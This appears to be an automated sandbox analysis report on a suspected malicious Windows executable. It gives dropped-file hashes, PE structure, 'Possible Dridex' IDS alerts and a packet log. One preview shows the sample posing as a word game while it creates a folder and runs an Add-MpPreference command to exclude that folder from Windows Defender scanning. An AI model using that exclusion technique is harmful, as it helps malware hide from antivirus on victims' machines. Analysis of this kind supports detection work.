                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YYjRtxS70h.exe
                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):476160
                                                                                                                                                                                                                    Entropy (8bit):7.302597587896513
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6144:fVpxoBb+6pIE70i+cif0o5HDl5nUnOpvJ3wpUfcx+43+jyQ/D5PvugK/alI1DB4E:6Ii+cni3h3wpUy+5jyqFvlMfQWt
                                                                                                                                                                                                                    MD5:F453C5F8C736FF8C381E7022CAD85E3E
                                                                                                                                                                                                                    SHA1:1906C904A33B1910B88F2020A7942776AB7AD54E
                                                                                                                                                                                                                    SHA-256:36A780C3CFCC5162D80BF88A5BA5F1BAC2149C1D6D3A04FF5536DECB31D494AC
                                                                                                                                                                                                                    SHA-512:B9A64DAA7591029D966D8AC6684C1EB049F6A3F89865FB760E0EBFE57DC300D3F6F50DACE3353E461370655A8D8BF518AC7B176C574F73ECD43713AD9851282F
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                    • Filename: Ttok18.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Mg..........................................@...........................(.............................................H.................................(........................................\...........P................................text............................... ....rdata..............................@..@.data...D!".........................@....00cfg........'.....................@..@.reloc.......(.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YYjRtxS70h.exe
                                                                                                                                                                                                                    File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):3609
                                                                                                                                                                                                                    Entropy (8bit):5.192441155502346
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:3ZQAA1+MLLqAMpwwyjDbcwMftic7+3OtZ7+3QlticB+3OtZB+3Qqntic0+3OtZ0I:6AaLcwtjcwM07gY5gqlqncw7
                                                                                                                                                                                                                    MD5:A5C845B3DE1AD3378885053D5203F23F
                                                                                                                                                                                                                    SHA1:86EA93FC86CE6B988CBDF1495156872FC2DAF7E7
                                                                                                                                                                                                                    SHA-256:E976DFE43359BE19B4C056CB0BA5D777481493AD503360422CA62EC8A8A38E6D
                                                                                                                                                                                                                    SHA-512:B18DBE6AE71E4B966F52000D8BCF10228C59DAA08CF5A115F2D5DDF780D198E9245BAF206595D6F488CC25FFB7502F61731E216EBE3B100C0F64C5F73F4E8927
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:Guess the word from the list:..1. Clan..2. Ocean..3. Sun..4. Queen..5. Dog..6. Nest..7. Penguin..8. Giraffe..9. River..10. Kite..11. Monkey..12. Tree..13. Banana..14. House..15. Fish..16. Elephant..17. Jungle..18. Apple..19. Car..20. Island..21. Lion..Enter the word: .Time's up! The program will input the word 'Clan'...Folder 'spxzLeEJs' successfully created on C drive....You won a random image:.... |\ \\\\__ o.. |\_/ o \ o .. |_ (( <==> o.. |/ \__+___/.. | / |....What image was generated? (fish, mountain, boat): .Time's up! The program will input the correct answer: fish..Error adding exclusion for C:\spxzLeEJs: Add-MpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: ..ConfigListExtension...At line:1 char:1..+ Add-MpPreference -ExclusionPath C:\spxzLeEJs..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreferenc
                                                                                                                                                                                                                    File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                    Entropy (8bit):0.013532866334979686
                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                    File name:YYjRtxS70h.exe
                                                                                                                                                                                                                    File size:13'793'970 bytes
                                                                                                                                                                                                                    MD5:5a59ce92b07de68c0be8fbd7944214e2
                                                                                                                                                                                                                    SHA1:b0536d674552c3a11a881b154b668af1b5222641
                                                                                                                                                                                                                    SHA256:e09ff2bd97040748812f0434e277b6623ac9aff565fc11003f9abfeeabe9110a
                                                                                                                                                                                                                    SHA512:e60be536b168890257e483912e89c5061a49f9781ec118517fc58a633ebf6e14cb6d917dc0c4b002faa07b4d4f2fa3b37d7f21725cf768dca74d397aee22f0bc
                                                                                                                                                                                                                    SSDEEP:384:x7NC8gTTF+chkAcvEUgE2a24dsp0T808rFaVz:PxgvF+6kVvfbcRaJ
                                                                                                                                                                                                                    TLSH:E2D6E60223E95126FA7F6B7D5C7242144733BDA3AC36EB4C29EC604E5FA778449607A3
                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....?..........."...0..4...........S... ...`....@.. ....................................`................................
                                                                                                                                                                                                                    Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                    Entrypoint:0x4053fa
                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                    Subsystem:windows cui
                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                    Time Stamp:0x833F0DF3 [Tue Oct 11 12:07:15 2039 UTC]
                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                    CLR (.Net) Version:v4.0.30319
                                                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x53a80x4f.text
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x58c.rsrc
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x531c0x38.text
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                    .text0x20000x34000x3400011f0b5a834ddae1739be2df85bbd209False0.48828125data5.376676584631292IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                    .rsrc0x60000x58c0x6006ce900aa6f5ef6addbe166008c1ea961False0.4134114583333333data4.023178449253273IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                    .reloc0x80000xc0x200ada691d652edc54d38296e18f64ff460False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                    RT_VERSION0x60900x2fcdata0.43848167539267013
                                                                                                                                                                                                                    RT_MANIFEST0x639c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                    mscoree.dll_CorExeMain
                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                    2024-12-23T09:01:51.144550+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44980137.27.43.98443TCP
                                                                                                                                                                                                                    2024-12-23T09:02:27.809321+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44988037.27.43.98443TCP
                                                                                                                                                                                                                    2024-12-23T09:03:04.237595+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44996437.27.43.98443TCP
                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                    Dec 23, 2024 09:01:07.345885992 CET49772443192.168.2.420.233.83.145
                                                                                                                                                                                                                    Dec 23, 2024 09:01:07.345912933 CET4434977220.233.83.145192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:07.345988989 CET49772443192.168.2.420.233.83.145
                                                                                                                                                                                                                    Dec 23, 2024 09:01:07.359390020 CET49772443192.168.2.420.233.83.145
                                                                                                                                                                                                                    Dec 23, 2024 09:01:07.359405994 CET4434977220.233.83.145192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:08.944979906 CET4434977220.233.83.145192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:08.945077896 CET49772443192.168.2.420.233.83.145
                                                                                                                                                                                                                    Dec 23, 2024 09:01:09.039179087 CET49772443192.168.2.420.233.83.145
                                                                                                                                                                                                                    Dec 23, 2024 09:01:09.039207935 CET4434977220.233.83.145192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:09.039655924 CET4434977220.233.83.145192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:09.081130028 CET49772443192.168.2.420.233.83.145
                                                                                                                                                                                                                    Dec 23, 2024 09:01:09.702905893 CET49772443192.168.2.420.233.83.145
                                                                                                                                                                                                                    Dec 23, 2024 09:01:09.743334055 CET4434977220.233.83.145192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:10.456841946 CET4434977220.233.83.145192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:10.457403898 CET4434977220.233.83.145192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:10.457551003 CET49772443192.168.2.420.233.83.145
                                                                                                                                                                                                                    Dec 23, 2024 09:01:10.457555056 CET4434977220.233.83.145192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:10.457629919 CET49772443192.168.2.420.233.83.145
                                                                                                                                                                                                                    Dec 23, 2024 09:01:10.466129065 CET49772443192.168.2.420.233.83.145
                                                                                                                                                                                                                    Dec 23, 2024 09:01:10.605777025 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:10.605875969 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:10.605969906 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:10.606420040 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:10.606451035 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:11.827982903 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:11.828177929 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:11.831177950 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:11.831193924 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:11.831501961 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:11.833133936 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:11.875344038 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.333348036 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.334330082 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.334366083 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.334408998 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.334444046 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.334494114 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.338545084 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.346954107 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.347034931 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.347048044 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.355284929 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.355359077 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.355369091 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.363651037 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.363702059 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.363712072 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.414755106 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.453233957 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.503175974 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.503191948 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.528965950 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.529184103 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.529195070 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.538003922 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.538099051 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.538115025 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.545478106 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.545553923 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.545564890 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.553064108 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.553127050 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.553138018 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.560663939 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.560740948 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.560750961 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.568193913 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.568270922 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.568280935 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.575710058 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.575805902 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.575813055 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.583221912 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.583297968 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.583308935 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.596586943 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.596724987 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.596790075 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.596797943 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.596853018 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.602602959 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.608618975 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.608735085 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.608736992 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.608760118 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.608918905 CET49778443192.168.2.4185.199.109.133
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.717252970 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.741467953 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.741477966 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.741548061 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.741566896 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.741574049 CET44349778185.199.109.133192.168.2.4
                                                                                                                                                                                                                    Dec 23, 2024 09:01:12.741602898 CET49778443192.168.2.4185.199.109.133
